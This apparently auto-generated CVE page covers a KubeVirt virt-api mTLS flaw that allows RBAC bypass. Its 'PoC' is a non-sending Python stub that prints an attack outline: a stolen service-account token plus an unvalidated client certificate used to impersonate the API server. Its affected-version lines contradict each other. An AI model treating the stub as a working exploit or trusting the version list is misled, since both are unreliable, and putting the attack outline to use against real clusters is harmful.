Security Vulnerability Report
CVE-2025-64432 CVSS 4.7 MEDIUM

CVE-2025-64432

Published: 2025-11-07 19:16:27
Last Modified: 2025-11-25 15:56:31

Description

KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer's authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failure to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:* - VULNERABLE
cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:* - VULNERABLE
cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:* - VULNERABLE
cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:* - VULNERABLE
KubeVirt < 1.5.3
KubeVirt 1.6.0
KubeVirt >= 1.5.3 (affected)
KubeVirt 1.6.1 (fixed)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-64432 PoC - KubeVirt mTLS Authentication Bypass

This PoC demonstrates the authentication bypass in KubeVirt's virt-api component.
Note: This is for educational and authorized testing purposes only.
"""


def create_malicious_request(target_host, target_port, service_account_token):
    """
    Create a malicious request that exploits the CN validation bypass.
    The attacker uses their own ServiceAccount certificate to impersonate
    the Kubernetes API server.
    """
    # Construct HTTP request to virt-api aggregated endpoint
    request = f"""POST /apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances HTTP/1.1
Host: {target_host}:{target_port}
Authorization: Bearer {service_account_token}
Content-Type: application/json
Content-Length: 0

"""
    return request.encode('utf-8')


def exploit_cve_2025_64432():
    """
    Main exploitation function for CVE-2025-64432
    """
    target_host = "kubevirt-api-service.namespace.svc"
    target_port = 6443
    print("[*] CVE-2025-64432 KubeVirt Authentication Bypass PoC")
    print(f"[*] Target: {target_host}:{target_port}")
    print("[*] Exploiting CN field validation bypass in mTLS authentication...")
    # Note: In real attack scenario:
    # 1. Attacker obtains a ServiceAccount token from compromised pod
    # 2. Attacker uses their own TLS client certificate
    # 3. The certificate CN is NOT validated against allowed values
    # 4. This allows bypassing RBAC controls
    # This PoC simulates the concept without actual exploitation
    print("[!] This is a demonstration script for authorized testing only")
    print("[!] Actual exploitation requires:")
    print("    1. Access to a pod within the Kubernetes cluster")
    print("    2. Ability to create/modify TLS certificates")
    print("    3. Network access to virt-api service")
    print("[*] Vulnerability: Missing CN validation in virt-api mTLS handling")
    print("[*] Impact: RBAC bypass, unauthorized VM access/creation")


if __name__ == "__main__":
    exploit_cve_2025_64432()
```

References

https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a (Patch)
https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b (Patch)
https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074 (Patch)
https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286 (Exploit, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-64432",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T19:16:26.833",
    "lastModified": "2025-11-25T15:56:30.843",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer's authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1."
      },
      {
        "lang": "es",
        "value": "KubeVirt es un complemento de gestión de máquinas virtuales para Kubernetes. Las versiones 1.5.3 e inferiores, y 1.6.0 contenían una implementación defectuosa del flujo de autenticación de la capa de agregación de Kubernetes que podría permitir la elusión de los controles RBAC. Se descubrió que el componente virt-API no logra autenticar correctamente al cliente al recibir solicitudes de API a través de mTLS. En particular, no logra validar el campo CN (Common Name) en los certificados TLS del cliente recibidos contra el conjunto de valores permitidos definidos en el configmap 'extension-apiserver-authentication'. La falta de validación de ciertos campos en el certificado TLS del cliente puede permitir a un atacante eludir los controles RBAC existentes al comunicarse directamente con el servidor API agregado, suplantando al servidor API de Kubernetes y su componente agregador. Este problema está corregido en las versiones 1.5.3 y 1.6.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 3.6
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "HIGH",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.0,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-287"},
          {"lang": "en", "value": "CWE-295"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "1.5.3", "matchCriteriaId": "D06A16D0-A19D-4FC9-BBB2-DD155157AD8E"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:-:*:*:*:kubernetes:*:*", "matchCriteriaId": "7AC531A2-1D99-4F6E-8C95-57B3B6B15681"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc0:*:*:*:kubernetes:*:*", "matchCriteriaId": "3A5C8C2B-705D-435E-93A7-0523DC4A97BE"},
              {"vulnerable": true, "criteria": "cpe:2.3:a:kubevirt:kubevirt:1.6.0:rc1:*:*:*:kubernetes:*:*", "matchCriteriaId": "A6326DB3-2CBC-4B85-94C8-9F2B2B458548"}
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/kubevirt/kubevirt/commit/231dc69723f331dc02f65a31ab4c3d6869f40d6a", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/kubevirt/kubevirt/commit/af2f08a9a186eccc650f87c30ab3e07b669e8b5b", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/kubevirt/kubevirt/commit/b9773bc588e6e18ece896a2dad5336ef7a653074", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-38jw-g2qx-4286", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}
```